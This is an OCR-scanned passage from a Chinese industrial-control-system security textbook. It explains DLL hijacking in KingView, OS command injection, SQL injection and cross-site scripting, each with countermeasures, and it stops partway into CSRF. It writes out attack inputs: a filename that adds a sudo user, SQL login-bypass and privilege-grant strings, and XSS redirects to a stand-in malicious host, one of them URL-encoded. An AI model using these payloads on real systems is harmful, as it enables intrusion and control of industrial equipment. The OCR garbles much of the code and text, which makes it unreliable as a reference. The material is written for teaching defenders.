8:13:4... gf Touchy EW. exe 1232 A QueryOpen C:\Program Files\Kingview\WINSPOOL.DRY NAME NOT FOUND 

8:13:4... HPTouchvVEW exe 1232 A QueryOpen C:\Program Files‘\Kingview\\WINMM. dll NAME NOT FOUND 

8:13:4... BPTouchvVEW exe 1232 A QueryOpen C:\Program Files‘\Kingview'\WSOCK32 dll NAME NOT FOUND 
i; TouchVEW.exe 1232 = *QuerOpen C:\Program Files\Kingview\WS2_32. dll NAME NOT FOUND 
... SB louchvEW exe 1232 SAQueryOpen C:\Program Files‘\Kingview\\Ww'S 2HELP. dll NAME NOT FOUND 
... TouchvE exe 1232 SA QueryOpen C:\Program Files‘\Kingview\KAT DBAPI. dll NAME NOT FOUND 
... MBlTouchvVEW exe 1232 SA QueryOpen C:\Program Files\KingviewS ORBA. dil NAME NOT FOUND 


任何 结果 输出 为 “NAME NOT FOUND” 的 路 径 都 是 DLL 劫持 的 潜在 目标 。WS2_32.dll 文 件 是 Windows 操 作 系 统 中 常用 的 DLL 文件 ， 借 助 该 文件 程序 能 够 使 
用 套 接 字 进行 网 络 通信 (因此 Ws 代 表 Windows 套 接 字 ) 。 而 对 于 一 个 谨 什 的 攻击 者 而 言 ， 为 了 隐 熙 地 入 侵 应 用 程序 ， 不 仅 会 劫持 DLL， 还 会 加 载 真 正 的 DLL， 并 
将 所 有 请 求 传递 给 它 来 实现 正常 功能 。 对 于 这 个 例子 我 们 不 会 再 继续 深入 讨论 。 下 面 给 出 的 是 伪造 Ws2_32.dll 文 件 的 完整 代码 : 


tinclude <windows.h> 


BOOL WINAPI D11Main ( 
__in HINSTANCE hinstDLL, 
in DWORD fdwReason, 
= in LPVOID lpvReserved 
i 
switch (fdwReason) { 
case DLL PROCESS ATTACH: 
break; 
case DLL PROCESS DETACH: 
break; 
case DLL THREAD ATTACH: 
break; 
case DLL THREAD DETACH: 
break; 


| 


return 0; 


这 段 代 码 是 做 什么 的 呢 ? 确切 地 说 什么 也 没 做 。 它 是 Visual Studio 在 创建 新 的 DLL 项 目 时 所 提供 的 框架 代码 。 但 是 ， 如 果 创 建 该 项 目 并 将 其 生成 结果 重 命 
为 WS2 32.dll (这 是 一 个 有 效 但 是 没有 具体 功能 的 DLL 文件 ) ， 那 么 TouchVew 程 序 将 会 加 载 失败 ， 这 意味 着 它 加 载 了 一 个 空 的 DLL 文件 ， 而 不 是 C: 
\Windows\system32 目 录 下 的 真正 文件 。 


将 空 DLL 文 件 放 在 C:\Program Files\KingView 目 录 下 ， 然 后 运行 TouchVew， 我 们 可 以 得 到 如 下 结果 : 


TouchVEW .exe - Application 


C63 The application Failed to initialize properly (OxcO150002), Click on OK to terminate the application. 


这 表明 程序 将 试图 加 载 我 们 构建 的 DLL 而 不 是 Windows 系 统 的 DLL。 此 时 ， 我 们 可 以 轻易 地 hook 到 程序 代码 ， 进 而 获取 整合 机 器 的 控制 权 。 


现在 读者 可 能 会 说 ，“ 是 这 样 ， 可 你 必须 手工 复制 文件 啊 。” 嗯 ， 将 其 与 前 面 提 到 的 ActiveX 目 录 遍 历 漏洞 相 结 合 ， 远 程 攻击 者 丈 能 够 替换 任意 目录 下 的 任意 
文件 。 那 么 ， 怎 样 才 能 够 阻止 攻击 者 在 KingView 程 序 目录 下 放 入 恶意 DLL 文件 呢 ? 答案 是 没有 办 法 (直到 该 漏洞 打上 补丁 ) 。 


3.DLL 劫 持 的 对 抗 措施 


从 攻击 造成 的 影响 上 来 说 ， 昌 然 DLL 劫 持 造 成 的 影响 非 党 大， 但 阻止 这 种 类 型 的 攻击 却 相对 比较 简单 。 其 天 键 在 于 确保 真正 的 DLL 文件 就 是 被 找到 的 那个 DLL 
文件 。 这 可 以 通过 将 DLL 文件 移动 到 操作 系统 要 查看 的 第 一 个 位 置 来 实现 。 然 后 ， 融 是 对 该 目录 进行 保护 ， 确 保 没 有 未 授权 用 户 修改 该 目录 中 的 文件 。 这 是 少数 可 
以 由 系统 管理 员 (具有 系统 权限 或 者 访问 权限 的 非 开 友 人 员 ) 直接 修复 的 软件 漏洞 。 


610 HA 


注入 类 型 的 漏洞 有 很 多 子 类 ， 但 是 它们 都 遵循 相同 的 原理 : 即 允 许 将 数据 解释 为 指令 的 代码 中 通常 都 存在 注入 漏洞 。 换 句 话说 就 是 ， 任 何 时 候 如 果 本 应 该 用 
作 数 据 的 字符 串 却 没有 被 正确 地 表示 为 数据 ， 那 么 该 字符 串 束 可 能 被 当 作 代码 指令 加 以 处 理 而 非 数 据 。 现 在 看 来 ， 这 条 原理 非 钊 抽象 ， 那 么 我 们 一 起 通过 几 个 实 
例 来 分 析 其 中 蕴含 的 思路 。 


1.0S 命 令 注入 


Vii tT VE : 


NN: 
IR Bit HERR : 


(1) OS 命令 注入 原理 


有 时 ， 采 用 用 户 提供 的 数据 可 以 作为 上 友 送 至 命令 解释 器 (或 者 称 之 为 shell 程 序 ) 的 字符 串 。 


$file = $ GET['filename'] ; 
Soutput = shell exec("cat Susername Sfile.txt") ; 
同 目录 遍历 攻击 很 相似 ， 部 分 特定 字符 可 以 使 这 段 代码 执行 异常 操作 O05 命令 注入 漏洞 比 目 录 遍 历 漏洞 的 功能 更 加 强大 ， 因 为 攻击 者 能 够 运行 任何 命令 ， 而 


不 仅仅 是 改变 文件 操作 的 目的 路 径 。 考 虑 到 文件 命名 格式 的 要 求 (<username>_<filename>.txt) ， 该 字符 串 看 起 来 似乎 是 安全 的 ， 但 是 假设 攻击 者 使 用 了 下 面 
的 字符 串 : blah.txt; adduser hacker sudo; ls*。 那 么 将 使 得 shell 命 令 看 起 来 像 下 面 这 样 (其 中 plebe 为 用 户 名 ) : 


cat plebe blan.txt; adduser hacker sudo; ls *.txt 


当 shell 程 序 对 分 号 进行 解析 时 ， 会 将 顺序 执行 的 各 条 命令 分 隅 开 来 。 所 以 ， 首 先 通 过 “cat” 命令 将 plebe_blah.txt 文 件 重 定向 到 标准 输出 流 。 然 后 ， 创 建 用 
户 hacker 并 将 其 添加 到 sudo 用 户 组 〈 从 而 使 该 用 户 成 为 管理 员 ) 。 最 后 ， 再 将 当前 目录 中 的 所 有 .txt 文 件 列表 回 送 到 标准 输出 流 。 然 而 ， 这 种 执行 效果 可 能 并 不 
是 程序 员 在 开发 程序 时 所 预想 的 。 


并 不 仅仅 只 有 分 号 会 导致 问题 ， 认 真 分 析 shell 脚 本 的 操作 符 会 帮 现 还 有 一 些 字 符 值 得 注意 。 其 中 包括 ， 重 定向 操作 符 ， 如 >、> > 和 < 都 可 以 改变 命令 的 输入 
源 路 径 或 输出 的 目的 路 径 。 管 道 操作 符 “|” 则 可 以 将 原始 命令 的 输出 友 送 到 攻击 者 定义 的 其 他 命令 。shell 脚 本 条 件 语句 中 的 逻辑 运算 符 “ 上 和“&&” 可 以 用 来 
将 多 个 命令 链接 在 一 起 。 此 外 ，$ (command) 和 'command' (R515) 形式 的 字符 串 也 可 以 用 于 执行 嵌入 任意 字符 串 的 shell 命 令 。 不 同 的 shell 程 序 中 具有 特 
殊 含 义 的 字符 也 不 同 。 所 以 ， 了 解 目标 所 使 用 的 shell 程 序 语句 在 尝试 发 起 命令 注入 攻击 时 帮助 甚大 。 


(2) 同 工 控 系 统 的 天 联 
尽管 shell 程 序 通 常 被 看 作 是 本 地 程序 ， 但 是 在 现实 中 存在 许多 远程 OS 命令 注入 漏洞 ， 包 括 下 面 这 些 来 自 工控 系统 领域 的 漏洞 : 
* https://ics-cert.us-cett.gov/advisories/ICSA-15-057-01 
- https://ics-cert.us-cert. gov /advisories/ICSA-14-269-01A 
- https: //ics-cert.us-cert. gov /advisories/ICSA-12-325-01 


(3) OS 命令 注入 的 对 抗 措施 


OS 命令 注入 漏洞 的 缓解 步骤 同 目录 遍历 漏洞 的 绥 解 步骤 非常 相似 ， 都 是 对 不 当 字 符 进 行 测试 并 拒绝 接收 包含 不当 字符 的 数据 ， 而 区 别 在 于 可 能 引发 问题 的 字 
符 不 同 。 在 某 些 情况 下 ， 可 能 还 需要 对 字符 进行 适当 的 转 义 。 当 输入 中 包含 对 于 操作 系统 有 意义 的 字符 时 就 是 这 样 。 转 义 字 符 通常 需要 在 适当 的 位 置 添加 反 和 斜 杠 
(\) 。 大 多 数 编程 语言 会 提供 库 遂 数 来 实现 该 功能 ， 因 此 尽量 不 要 采用 自己 编写 的 消 数 。 


2.SQL 注 入 


HITE: 


(1) SQL 注入 原理 


许多 工控 系统 设备 ， 特 别 是 人 机 界面 ， 都 在 努力 跟 上 不 断 变化 的 技术 和 客户 需求 ， 因 此 现在 这 些 设备 普遍 采用 了 Web 界 面 。 从 可 用 性 和 便捷 性 角度 来 说 ， 这 
是 一 个 伟大 的 转变 。 然 而 ， 像 传统 编程 实践 一 样 ，Web 开 发 在 安全 实践 方面 也 很 落后 。 影 响 Web 开 发 的 一 种 典型 安全 漏洞 束 是 SQL 注入 。 与 所 有 其 他 形式 的 注入 
相 类 似 ，SQL 注 入 也 是 对 用 户 提 交 的 数据 进行 某 种 形式 的 利用 从 而 导致 用 户 数 据 被 解释 为 代码 ， 进 而 执行 恶意 功能 。 而 在 SQL 注 入 中 ， 解 释 得 到 的 代码 就 是 SQL 语 
I. 


以 下 是 登录 脚本 中 常用 的 查询 语句 ， 而 这 段 脚 本 是 存在 漏洞 的 : 


Susr = $ POST['username'] ; 
Spwd = $ POST['password'] ; 


sq = "SELECT 1d FROM user WHERE username = 'Susr' AND pwd = shal('" 
Susr . Spwd 
sh le! 
$result = mysql query ($q); 
if (mysql num rows ($result) > 0) { 
// Login success 
$row = mysql fetch assoc(Sresult) ; 
$ SESSION['user_id'] = Srow['id']; 
FF 
} else { 
echo "Incorrect username or password"; 
exit; 


遗憾 的 是 ， 类 似 的 情况 相当 普遍 。 这 段 脚本 看 起 来 也 能 正常 工作 ， 脚 本 中 甚至 采用 用 户 名 对 口令 形式 进行 散 列 变换 来 防止 彩虹 表 攻 击 。 但 是 ， 通 过 $usr 变 量 
就 能 够 对 这 段 查询 脚本 发 起 SQL 注 入 攻击 。 如 果 将 $usr 设 置 为 admin'--， 那 么 我 们 就 会 遇 到 麻烦 了 。 为 什么 呢 ” 因 为 得 到 的 查询 语句 将 如 下 所 示 : 


SELECT id FROM user WHERE username = 'admin' -- ! 
AND pwd = shal('admin' -- anypassword') 


(注意 两 个 破 折 号 之 后 的 空格 ) 是 MySQL 中 的 注释 标记 ， 表 示 之 后 的 所 有 内 容 都 可 以 被 忽略 。 这 是 一 条 非常 有 用 的 语言 特性 ， 人 允许 程序 员 向 代码 阅读 


者 解释 查询 语句 的 作用 ， 但 如 果 不 对 输入 加 以 验证 则 会 导致 SQL 注入 漏洞 。 就 MySQL 命 令 解释 器 而 言 ， 该 查询 语句 等 价 于 
SELECT id FROM user WHERE username = ‘'admin' 


UREA SA admin 的 用 户 ， 那 么 在 登录 时 这 段 代 码 融 会 把 攻击 者 当 作 该 用 户 。 这 样 束 出 问题 了 。 虽 然 读 者 可 能 认为 测试 是 否 人 存在 SQL 注入 漏洞 的 存在 
非常 困难 ,但 是 只 需要 在 每 个 可 能 的 字段 中 放 一 个 引号 字符 ( 单 引号 ["] 或 者 双 引 号 ["]， 取 决 于 程序 员 的 使 用 方式 ) ， 或 者 注释 标记 ， 然 后 查看 响应 信息 中 是 否 包 
含 SQL 错 误 消 息 ,或 者 应 用 程序 是 否 运 行 异常 即 可 ， 此 时 SQL 注 入 漏洞 常常 束 会 暴露 出 来 。 对 当前 使 用 的 特定 数据 库 和 有 一 定 了 解 在 测试 过 程 中 会 有 所 帮助 ， 但 是 对 
所 有 流行 的 字符 串 均 进行 一 遍 测试 也 不 会 耗费 很 长 时 间 。 


SQL 注入 漏洞 不 仅仅 会 出 现在 典型 的 登录 绕 过 场景 中 ， 借 助 SQL 注 入 漏洞 还 可 以 对 其 他 SELECT 查询 语句 进行 修改 ， 获 取 到 用 户 原 本 无 法 访问 的 数据 。 它 也 可 
以 用 多 种 方式 修改 INSERT、UPDATE 和 DELETE 等 查询 语句 ， 实 现 对 数据 库 的 操作 。SsQL 注 入 可 以 用 于 获取 初始 访问 权限 、 提 升 权限 、 隐 藏 攻 击 证据 ， 或 者 只 是 拒 
绝 向 合法 用 户 提供 服务 。 同 时 ，SQL 注 入 还 可 以 用 于 对 其 他 用 户 帮 起 进一步 的 攻击 。 接 下 来 让 我 们 再 来 看 几 个 实例 。 


下 面 是 一 条 简单 的 查询 语句 ， 作 用 是 允许 用 户 更 改口 令 : 

UPDATE user SET password = shal('Spwd') 

WHERE username = 'Susr' AND password = shal('Sold_pwd') 

只 有 当 与 原 有 口令 相 匹 配 时 ， 该 查询 语句 才 会 将 用 户口 令 更 改 为 新 口令 否则， 查询 语句 将 不 会 对 数据 库 中 的 任意 一 行 数据 产生 影响 。 但 是 如 果 $pwd 变 量 被 
设置 为 mypass， 而 且 $usr 变 量 被 设置 为 myuserOR1=1--? 那么 就 会 得 到 下 面 的 查询 语句 : 


UPDATE user SET password = shal('mypass') 
WHERE username = 'myuser!' OR 1=1-- ' AND password = shal('oldpassword' } 


正如 我 们 前 面 所 看 到 的 ， 注 释 标 记 使 得 标记 之 后 的 所 有 内 容 被 忽略 。 另 一 个 有 趣 的 部 分 是 OR1=1。 这 基本 上 使 得 整 条 WHERE 子 句 为 永 真 ， 它 意味 着 每 个 用 
尸 都 会 把 他 的 口令 密码 重 置 为 “mypass”。 这 还 不 是 最 不 易 察 党 的 攻击 ， 因 为 许多 合法 用 尸 友 现 他 们 的 密码 失效 时 ， 会 通过 标准 密码 恢复 过 程 进行 密码 重 置 ， 从 
而 导致 上 述 攻击 失败 。 但 是 在 此 期 间 ， 攻 击 者 可 以 用 任何 人 的 身份 进行 登录 ， 其 中 也 包括 管理 员 。 只 需要 几 秒 钟 束 可 以 植 入 后 门 或 对 系统 造成 其 他 损害 。 


假设 有 一 套 权限 管理 系统 ， 根 据 数据 库 中 的 表 进 行 权限 控制 。permission 表 中 可 以 包含 以 下 字段 : id、user_id、object 和 access_level。 
也 许 用 户 可 以 请 求 对 某 种 类 型 对 象 的 访问 ， 但 是 只 有 只 读 权 限 。 在 PHP 中 实现 该 任务 的 查询 语句 如 下 : 


Sq = "INSERT INTO permission (user id, object, access level) 
VALUES (" . $ SESSION[;user id;] ."," . § GET['object'] .", 'read- 
only' ) 1 ; 


好 吧 ， 残 像 任何 其 他 用 户 一 样 ， 攻 击 者 对 于 object 字 段 也 只 有 访问 权限 。 确 定 其 他 字段 的 内 容 超 出 了 攻击 者 的 控制 能 力 。 那 么 ， 后 果 能 有 多 糖 糕 呢 ” 现在 ， 
读者 可 能 已 经 摸 到 了 穿 门 。 让 我 们 将 下 面 的 内 容 作 为 object 的 值 : 


valves', '‘read-write'), (572, ‘logs 


这 次 我 们 不 使 用 注释 标记 (这样 做 是 为 了 说 明 注 释 标 记 并 不 总 是 必需 的 ) 。 对 于 该 输入 得 到 的 查询 语句 如 下 : 
INSERT INTO permission (user_id, object, access level) 


VALUES (123,' valves', ‘read-write'), (572, 'logs', 'read-only') 


注意 ， 攻 击 者 可 能 不 知道 自己 的 user_ id 是 什么 ， 在 这 种 情况 下 ， 第 二 个 元 组 除了 保证 查询 语句 语法 正确 之 外 没有 意义 。 但 该 查询 语句 的 执行 结果 却 是 在 数据 
库 中 插入 了 两 行 数 据 。 其 中 一 行 数据 的 作用 是 不 管用 户 ?72 到 底 是 谁 ， 赋 予 用 户 972 对 logs 对 象 的 只 读 访问 权限 。 而 另 一 行 数据 的 作用 则 是 赋予 了 攻击 者 对 valves 
对 象 的 读 写 访 问 权 限 。 
SQL 注入 一 直 是 最 常见 的 Web 漏 洞 之 一 。 对 于 复杂 情况 下 SQL 注入 的 使 用 (如 果 存 在 复杂 情况 的 话 ) ， 可 以 碍 
看 https://www.owasp.org/index.php/Testing for SQL Injection (OTG-INPVAL-005) 
5https://www.owasp.org/index.php/SQL Injection Prevention Cheat Sheet 深 入 了 解 所 有 的 细节 。 
(2) 同 工 控 系统 的 关联 


虽然 本 节 中 涉及 的 具体 代码 均 采 用 PHP 语 言 实 现 ， 但 是 如 果 没 有 采取 适当 的 预防 措施 ， 其 他 所 有 进行 SQL 查询 的 语言 也 都 可 能 存在 漏洞 。 而 且 正 如 预料 到 的 


一 样 ， 和 存在 大 量 包 含 SQL 注入 漏洞 的 工控 系统 应 用 程序 : 
- https: //ics-cert.us-cert. gov /advisories / ICS A-15-132-01 
- https: //ics-cert.us-cert. gov /advisories / ICS A-11-082-01 
* https: //ics-cert.us-cert. gov /advisories / ICS A-14-135-01 
(3) SQL 注入 的 对 所 措施 


SQL 注入 漏洞 无 论 是 对 于 工控 系统 环境 还 是 对 于 互联 网 而 言 都 是 一 个 巨大 的 威胁 。 但 幸运 的 是 ， 友 现 和 修复 这 些 漏洞 很 容易 。 在 代码 中 ，SQL 查 询 通常 表示 为 
一 个 字符 串 。 人 存在 漏洞 的 查询 语句 往往 使 用 了 未 进行 正确 转 义 的 用 户 输入 数据 来 直接 构造 这 些 字符 串 。 对 此 ， 有 以 下 几 种 方法 来 解决 这 个 问题 。 一 种 是 对 用 户 输 
入 的 数据 进行 正确 转 义 ， 确 保 数据 不 会 被 一 组 引号 打 断 。 在 PHP 语 言 中 ， 可 以 调用 专门 的 转 义 函数 ， 如 mysql_real_escape_string () (是 的 ，PHP 语 言 中 有 些 消 
数 名 长 到 可 怕 ) 。 而 更 好 的 解决 方案 是 使 用 预先 准备 好 的 语句 。 在 某 种 程度 上 ， 预 先 准 备 好 的 语句 就 像 格式 化 字符 串 。 因 为 ， 其 中 查询 字符 串 始 终 都 是 相同 的 ， 
对 于 要 插入 的 用 户 数据 则 用 占 位 符 表 示 ， 然 后 将 用 户 数据 单独 绑 定 到 查询 语句 中 。 其 中 ， 对 于 循环 体内 部 执行 的 查询 语句 ， 如 果 每 次 友 代 均 使 用 不 同 的 数据 ， 那 
么 使 用 预先 准备 好 的 查询 语句 实际 上 比 使 用 “传统 ”查询 语句 的 执行 速度 更 快 。 所 以 无 论 怎样 ， 这 种 解决 方法 都 很 不 错 。 同 大 多 数 Web 安 全 相关 的 内 容 一 
样 ，OWASP 也 发 表 了 一 篇 关于 如 何 防止 SQL 注入 的 好 文章 (https://www.owasp.org/index.php/SQL Injection Prevention Cheat Sheet) 。 


6.1.9” 跨 着 脚本 


wits JE : 


FA sa ap 


1. 跨 站 脚本 原理 


XSS 是 跨 站 脚本 (cross-site scripting) 的 缩写 (之 所 以 不 使 用 CSS， 是 因为 同样 是 在 Web 领 域 ，CSS 已 经 被 用 来 表示 层 蔷 样式 表 了 ) 。 名 字 听 起 来 可 能 有 些 
奇怪 ， 但 其 实 束 是 通过 各 种 技 I5 进 行 HTML 注 入 来 实现 JavaScript 脚 本 的 执行 。 由 于 工控 系统 和 SCADA 设 备 中 Web 界 面 的 数量 迅速 增长 ，XSS 漏 洞 对 于 工控 系统 
人 员 来 说 也 成 为 了 一 种 值得 关注 的 漏洞 。 


XSS 漏 洞 主 要 有 两 种 类 型 : 反射 型 和 存储 型 。 反 射 型 XSS 漏 洞 是 将 页 面 URL 中 提供 的 参数 以 某 种 方式 呈现 到 HTML 代 码 中 ， 通 常 是 直接 显示 给 用 户 。 存 储 型 
XSS 漏 洞 则 是 将 保存 在 数据 库 中 或 者 以 其 他 方式 持久 存储 的 值 呈 现 到 HTML 代 码 中 。 这 两 种 类 型 的 XSS 漏 洞 都 比较 危险 ， 攻 击 者 的 利用 方式 也 略 有 不 同 。 


反射 型 XSS 漏 洞 的 常见 示例 是 具有 消息 动态 设置 功能 的 页 面 。 该 消息 可 以 显示 用 户 名 ， 也 可 以 显示 错误 消息 。 思 考 下 面 的 URL 及 PHP 与 HTML 相 结合 的 代码 


https://securingics.com/error.php?msg=You do not have access to this page 


<span><?php echo $ GET['msg']; ?></span> 


其 中 msg 变 量 只 是 向 用 户 回 送 数据 。 那 么 ， 如 果 攻 击 者 修改 了 该 变量 ， 然 后 将 结果 链接 发 送 给 别人 ， 比 如 发 起 鱼 又 式 钓 鱼 攻击 怎么 办 ? 也 许 URL 域 是 用 户 信 
任 的 ， 又 或 者 用 户 根 本 不 会 去 看 链接 到 底 指向 哪里 (这 种 情况 更 有 可 能 ) ， 而 仅 仪 只 是 点 击 链 接 ， 看 看 有 没有 什么 有 趣 的 东西 或 者 其 他 相关 的 什么 东西 。 


针对 XSS 漏 洞 的 典型 测试 方式 是 查看 是 否 可 以 得 到 一 个 弹出 的 警告 框 。 此 时 ， 可 以 将 msg 变 量 设置 为 


<script>alert ('XSS')</script> 


得 到 URL 
https://securingics.com/error.php?msg=<script>alert ('XSS') </script> 
从 而 导致 页 面 中 的 HTML 代 码 为 : 

<Span><script>alert ('XSS')</script></span> 


最 后 弹出 显示 “XSS” 字 样 的 警告 对 话 框 : 


The page at www.securingics.com says: 


XSS 


这 实际 上 就 给 出 了 PoC。 如 果 不 选 择 弹出 警告 对 话 框 ， 而 是 选择 将 用 户 重 定向 到 一 个 恶意 网 站 ， 该 恶意 网 站 中 包含 有 功能 强大 的 恶意 代码 ， 那 么 这 时 该 怎么 
办 ?其实 很 简单 ， 你 只 需要 用 location.href='http://myevilwebsite.com' 蔡 换 alert ('XSS') 就 可 以 了 。 在 浏览 器 中 的 任何 位 置 设置 location.href 都 将 导致 浏览 县 
访问 该 URL。 “但 是 ，” 读 者 可 能 会 抗议 ，“ 任 何 一 个 视力 正常 的 人 都 会 友 现 那 是 一 个 可 疑 的 URL， 而 不 去 点 击 链接 。” 也 许 吧 。 为 了 避免 这 种 情况 ， 有 时 攻击 者 
会 对 脚本 进行 编码 ， 以 免 脚 本 看 起 来 太 过 可 疑 (虽然 坦率 地 讲 ， 采 用 编码 这 种 方式 本 身 看 起 来 就 很 可 疑 ) 。 编 码 过 后 的 脚本 如 下 所 示 : 


%3c%733%63%72%69%70%74%3e%6Cc%6Í%63%61%74%69%6fÍ%6e%2e%68%72%65%66%3qd%27%68%74%74%70%3a%2f5%2 
f%6d%793%65%763%69%6C%777653%62%733%693%743%653%2e363%6fÉ%6d%27%3C%2f%73%63%727%69%70%747%3e 


考虑 到 当前 又 自 又 长 的 URL 已 经 非常 普遍 了 (通常 是 由 于 推广 链接 、 分 析 引 擎 之 类 的 忒 西 所 导致 ) ， 大 多 数 人 从 心理 上 已 经 接受 了 这 种 情况 ， 从 而 忽略 了 跟 
在 URL 后 面 看 起 来 奇 奇怪 怪 的 东西 。 而 关键 在 于 ， 成 功 对 XSS 漏 洞 加 以 利用 的 情况 比 读者 想象 中 的 更 为 常见 。 (这 里 所 说 的 “读者 ”， 是 指 具备 安全 意识 的 人 员 ， 
实际 上 正 是 这 些 人 促成 了 本 书 的 完成 。) 


至 于 存储 型 XSS 漏 洞 则 是 另 一 回 事 。 存 储 型 XSS 漏 洞 所 针对 的 不 是 向 某 一 个 用 户 友 送 恶 意 URL， 而 是 影响 网 站 的 所 有 用 户 一 甚至 包括 基于 Web 的 人 机 界面 。 当 
网 站 用 户 能 够 彼此 交互 (发 送 消息 、 查 看 简历 或 浏览 其 他 用 户 创 建 的 内 容 等 ) 时 ,或 者 当 管 理 员 接收 用 户 生 成 的 内 容 ， 例 如 日 志和 其 他 报告 机 制 时 ， 存 储 型 XSS 漏 
洞 融会 威胁 到 系统 安全 。 人 存储 型 XSs 漏 洞 使 得 攻击 者 “设置 完成 后 即 无 需 再 予 天 注 ” (set it and forget it) ， 即 只 需 将 漏洞 利用 代码 放 在 合适 的 地 方 ， 然 后 等 待 
某 一 个 用 户 在 某 一 时 刻 中 招 就 行 了 。 


任何 呈现 为 HTML 代 码 并 且 未 经 HTML 字 符 检 查 的 用 户 数据 都 可 能 成 为 潜在 的 威胁 。 要 使 Javascript 代 码 在 另 一 台 计 算 机 上 运行 ， 只 需要 把 对 该 用 户 可 见 的 图 
标的 标签 文本 加 以 修改 即 可 。 像 反射 型 XSS 攻 击 一 样 ， 代 码 惑 可 以 将 用 户 重 定向 到 恶意 网 站 了 。 如 果 系 统 不 能 直接 访问 互联 网 ， 那 么 可 以 使 用 从 数据 库 中 提取 字段 
的 形式 ， 或 者 利用 攻击 者 在 服务 器 上 创建 上 传 文件 等 形式 (无论 是 通过 官方 途径 或 其 他 黑客 手段 ) 来 上 传 更 加 复杂 的 漏洞 利用 代码 。 


有 时 ， 可 用 字段 或 许 没 有 足够 的 空间 来 存储 完整 的 XSs 脚 本 ， 但 这 不 一 定 就 会 使 网 页 免 遭 攻击 。 假 设 我 们 有 一 个 页 面包 含 以 下 代码 : 


<hi><?php echo $title; ?></hl> 
<p><?php echo Slabel; ?></p> 
<p><?php echo Sdescription; ?></p> 


再 进一步 假设 这 些 变量 都 是 由 用 户 来 定义 的 ， 但 是 变量 的 长 度 受 到 限制 ， 其 中 要 求 title 少 于 20 字 符 ，label 少 于 10 字 符 ，description 少 于 40 字 符 。 这 已 经 非常 
短 了 。 而 漏洞 利用 字符 串 


<script>location.href='http://x.com'</script> 


的 长 度 为 45 个 字符 。 即 便 攻击 者 能 够 确保 在 这 么 短 的 域名 中 容纳 恶意 代码 ，45 个 字符 对 于 任何 一 个 字段 而 言 还 是 太 长 了 。 那 么 该 怎么 办 呢 ? 
这 时 就 可 以 通过 注释 标记 来 解决 ! 考虑 按照 下 面 的 方式 来 设置 变量 : 
Stitle = <script>location./* (19 characters) 


Slabel */href=/* (9 characters) 
Sdescription = */"http://myevilwebsite.com"</script> (37 characters) 


此 时 得 到 的 HTML 代 码 为 : 
<hl><script>location./*</hl> 
<p>*/href=/*</p> 
<p>*/"http://myevilwebsite.com"</script></p> 

AE AALR! 让 我 们 把 它 分 解 一 下 。 首 先 ，JavaScript 脚 本 代码 的 执行 过 程 中 会 忽略 “/*” 和 “*/” 之 间 的 所 有 内 容 。 这 一 点 很 像 MySQL 中 的 “--” 标 记 ， 


这 使 得 程序 员 能 够 插入 注释 来 解释 代码 的 功能 。 考 虑 到 这 些 注释 标记 在 HTML 中 的 位 置 ， 所 以 仍然 能 够 得 到 语法 正确 的 Javascript 脚 本 和 语法 正确 的 HTML 代 码 
(虽然 不 会 在 短 时 间 内 通过 任何 HTML 验 证 器 ) 。 


如 果 攻 击 者 考虑 到 需要 确保 HTMI 代 码 的 有 效 性 并 关注 其 中 是 否 包 含 足够 的 空间 ， 那 么 可 以 在 最 后 一 个 变量 的 末尾 添加 </h1l><p>， 因 为 JavaScript 脚 本 会 注释 


挤 这 些 标签 。 


ay 


从 HTML 解 析 器 的 角度 ， 之 前 的 代码 片段 表示 为 

<hli><scriptsJavaScript stuff here</script></p> 
从 Javascript 解 析 器 的 角度 ，< script> 标 签 之 间 的 代码 表示 为 : 
location.href="http://myevilwebsite.com" 


这 正 是 从 一 开始 时 我 们 所 想 要 实现 的 目标 。 当 给 定 字段 的 空间 有 限时 ， 利 用 这 种 技巧 可 以 将 较 长 的 脚本 链接 在 一 起 。 如 果 某 个 站 点 允许 攻击 者 新 建 多 条 记 
录 ， 那 么 攻击 者 可 能 开发 出 对 数据 库 中 多 条 记录 进行 漏洞 利用 的 脚本 。 只 要 你 想 ， 束 一 定 能 找到 漏洞 利用 的 办 法 。 


2. 同 工控 系统 的 关联 


随 着 网 站 的 功能 越 来 越 多 ， 无 论 是 在 互联 网 上 ， 还 是 在 本 地 服务 器 或 设备 上 ，Web 漏 洞 都 给 工控 系统 带 来 了 越 来 越 多 的 风险 。 许 多 应 用 程序 和 设备 都 已 经 被 
Maz, Bilan, 


* https: //ics-cert.us-cert. gov /advisories /ICSA-12-016-01 
- https: //ics-cert.us-cert. gov /advisories /ICSA-11-147-02 


- https: //ics-cert.us-cert. gov /advisories / ICS A-12-039-01 


3. 跨 站 脚本 的 对 抗 措施 


与 其 他 注入 类 型 的 漏洞 相似 ， 通 过 对 危险 字符 进行 正确 的 转 义 可 以 降低 XSS 漏 洞 的 影响 。 虽 然 在 这 种 情况 下 ， 应 该 将 字符 串 中 所 有 符合 规范 的 HTML 字 符 转 换 
为 对 应 的 HTML 实 体 。 例 如 ， 将 <script> 之 类 的 内 容 转 换 为 &lt; script&gt; ， 而 这 在 浏览 器 中 仪 仪 显 示 为 “<script>”， 而 非 解释 为 HTML 人 代码。 无 论 是 
Javascript 语 言 ， 还 是 读者 喜欢 的 其 他 服务 器 端 开 发 语言 中 都 有 专门 的 函数 来 处 理 相应 问题 。 


上 述 对 抗 措施 已 然 能 够 应 对 大 多 数 的 情况 ， 但 仍然 不 一 定 可 以 确保 系统 免 遭 XSS 的 攻击 。 如 果 被 回 送 到 页 面 的 数据 已 经 包含 在 <script> 标 签 中 了 ， 那 么 就 必 
须 对 其 他 字符 进行 转 义 。 这 一 切 都 取决 于 字符 串 将 在 哪里 显示 ， 以 及 在 数据 周边 代码 中 的 哪些 字符 是 特殊 的 。OWASP 对 于 该 类 问题 提出 了 详细 的 处 理 方法 
(https://www.owasp.org/index.php/XSS_ (Cross Site Scripting) _Prevention Cheat Sheet) 。 


6.1.10” 跨 站 请 求 伪 造 


1. 跨 站 请 求 伪造 原理 


CSRF 是 跨 站 请 求 伪 造 (Cross-Site Request Forgery) 的 缩写 (有 时 也 缩写 为 XSRF， 以 保持 同 XSS 缩 写 的 一 致 ) 。CSRF 攻 击 是 一 种 会 话 劫持 类 型 的 攻击 。 
攻击 的 实施 依赖 于 受害 者 的 认证 信息 。 站 点 的 合法 用 户 登录 站 点 并 启动 会 话 。 然 后 ， 用 户 会 浏览 一 个 恶意 站 点 (通过 欺骗 或 XSS 等 方式 ) ， 该 恶意 站 点 中 包含 一 个 
